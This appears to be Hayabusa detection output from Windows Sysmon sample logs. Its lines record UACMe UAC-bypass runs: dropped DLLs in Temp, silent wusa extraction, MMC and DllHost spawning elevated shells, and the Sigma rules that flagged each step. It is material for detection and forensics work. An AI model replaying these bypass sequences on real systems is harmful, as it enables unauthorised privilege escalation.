+2019-08-03 21:08:23.554 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 272 00000280644BC500 | LID: 0x3e7 | PID: 4192 | PGUID: 747F3D96-7937-5D45-0000-00100D290801",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:23.555 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\consent.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7564 | Src PGUID: 747F3D96-7934-5D45-0000-0010CAB90701 | Tgt PID: 4192 | Tgt PGUID: 747F3D96-7937-5D45-0000-00100D290801,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:23.555 +09:00,MSEDGEWIN10,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:25.165 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 5336 | PGUID: 747F3D96-792D-5D45-0000-00104F190601,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:55.408 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BCAF0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3116 | PGUID: 747F3D96-7957-5D45-0000-00100E620A01,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 37 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 4884 | PGUID: 747F3D96-7E92-5D45-0000-0010FF472601",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:31:15.096 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:31:15.096 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\GdiPlus.dll | Process: C:\Windows\explorer.exe | PID: 4884 | PGUID: 747F3D96-7E92-5D45-0000-0010FF472601,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:31:15.354 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 37 | LID: 0x18d3fb | PID: 932 | PGUID: 747F3D96-7E93-5D45-0000-0010AA622601",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:31:15.364 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 400 00000280644220C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3796 | PGUID: 747F3D96-7E93-5D45-0000-001008652601,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 37 | LID: 0x18d3b3 | PID: 6576 | PGUID: 747F3D96-7E93-5D45-0000-0010AA8A2601",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using NTFS Reparse Point - Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:31:27.049 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC040 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 2352 | PGUID: 747F3D96-7E9E-5D45-0000-001080D92601,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:31:27.683 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 4884 | PGUID: 747F3D96-7E92-5D45-0000-0010FF472601,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 36 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 5284 | PGUID: 747F3D96-7EE2-5D45-0000-00104E852801",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:34.875 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\MSCOREE.DLL | Process: C:\Windows\explorer.exe | PID: 5284 | PGUID: 747F3D96-7EE2-5D45-0000-00104E852801,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:34.875 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:35.085 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3fb | PID: 2740 | PGUID: 747F3D96-7EE2-5D45-0000-0010E49C2801",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:35.137 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 400 00000280644220C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3652 | PGUID: 747F3D96-7EE2-5D45-0000-0010F19E2801,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3b3 | PID: 2348 | PGUID: 747F3D96-7EE3-5D45-0000-0010AFC12801",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using NTFS Reparse Point - Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:36.794 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\dcomcnfg.exe"" | Process: C:\Windows\System32\dcomcnfg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3fb | PID: 7180 | PGUID: 747F3D96-7EE4-5D45-0000-001015F72801",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:36.812 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 318 0000028064471E00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 1708 | PGUID: 747F3D96-7EE4-5D45-0000-001029F92801,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:37.160 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\dcomcnfg.exe"" | Process: C:\Windows\System32\dcomcnfg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3b3 | PID: 1240 | PGUID: 747F3D96-7EE4-5D45-0000-001091122901",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:37.184 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\mmc.exe C:\Windows\system32\comexp.msc | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\dcomcnfg.exe"" | LID: 0x18d3b3 | PID: 7636 | PGUID: 747F3D96-7EE5-5D45-0000-001076162901",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:37.261 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BCAF0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 344 | PGUID: 747F3D96-7EE5-5D45-0000-0010B71B2901,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:38.640 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 5284 | PGUID: 747F3D96-7EE2-5D45-0000-00104E852801,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:49.013 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC3D0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 796 | PGUID: 747F3D96-7EF1-5D45-0000-0010DDBF2901,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:49.525 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7400 | PGUID: 747F3D96-7E25-5D45-0000-0010D0AF2301,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 38 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 3508 | PGUID: 747F3D96-9122-5D45-0000-0010710D6101",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:26.782 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | Process: C:\Windows\explorer.exe | PID: 3508 | PGUID: 747F3D96-9122-5D45-0000-0010710D6101,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:27.060 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 398 000002806443AF40 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5128 | PGUID: 747F3D96-9122-5D45-0000-001042326101,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:27.356 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc"" | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 38 | LID: 0x18d3b3 | PID: 4372 | PGUID: 747F3D96-9123-5D45-0000-001087596101",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:29.101 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:50105 (MSEDGEWIN10.home) | Dst: 185.199.111.153:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\mmc.exe | PID: 4372 | PGUID: 747F3D96-9123-5D45-0000-001087596101,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" | Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc"" | LID: 0x18d3b3 | PID: 3180 | PGUID: 747F3D96-9124-5D45-0000-001022926101",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:29.459 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" | LID: 0x18d3b3 | PID: 6236 | PGUID: 747F3D96-9124-5D45-0000-00103B986101",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:29.461 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Temp\fubuki.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3180 | Src PGUID: 747F3D96-9124-5D45-0000-001022926101 | Tgt PID: 6236 | Tgt PGUID: 747F3D96-9124-5D45-0000-00103B986101,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 39 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 4480 | PGUID: 747F3D96-A356-5D45-0000-001029AA9901",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\pe386.dll | Process: C:\Windows\explorer.exe | PID: 4480 | PGUID: 747F3D96-A356-5D45-0000-001029AA9901,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,high,Evas | PrivEsc,UAC Bypass Using .NET Code Profiler on MMC,,../hayabusa-rules/sigma/file_event/sysmon_uac_bypass_dotnet_profiler.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:06.730 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mmc.exe"" eventvwr.msc | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 39 | LID: 0x18d3fb | PID: 1492 | PGUID: 747F3D96-A356-5D45-0000-0010C5C59901",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:06.796 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 376 0000028064463A00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7840 | PGUID: 747F3D96-A356-5D45-0000-001006D49901,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:07.144 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mmc.exe"" eventvwr.msc | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 39 | LID: 0x18d3b3 | PID: 4056 | PGUID: 747F3D96-A356-5D45-0000-001014F99901",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:07.508 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\IEUser\AppData\Local\Temp\pe386.dll | Process: C:\Windows\System32\mmc.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 4056 | PGUID: 747F3D96-A356-5D45-0000-001014F99901 | Hash: SHA1=60BFDEAE730B165AF65A82817CED76F7400C9CF0,MD5=CC591D9CA772C818093FED853BF64848,SHA256=EC793B0A45BDB2F15D210E545A893AA096D68FF537DD022C4B443BDE2A448491,IMPHASH=069E5461D2FBAD8D4C3909C4E0340847",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\mmc.exe"" eventvwr.msc | LID: 0x18d3b3 | PID: 5396 | PGUID: 747F3D96-A357-5D45-0000-0010BD149A01",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,high,LatMov,MMC Spawning Windows Shell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 41 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 8100 | PGUID: 747F3D96-A54E-5D45-0000-001080F2A001",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
+2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
+2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
+2019-08-04 00:16:31.012 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 342 00000280644BB040 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 1080 | PGUID: 747F3D96-A54E-5D45-0000-0010D507A101,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
+2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | LID: 0x18d3b3 | PID: 1716 | PGUID: 747F3D96-A54F-5D45-0000-0010D83FA101",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
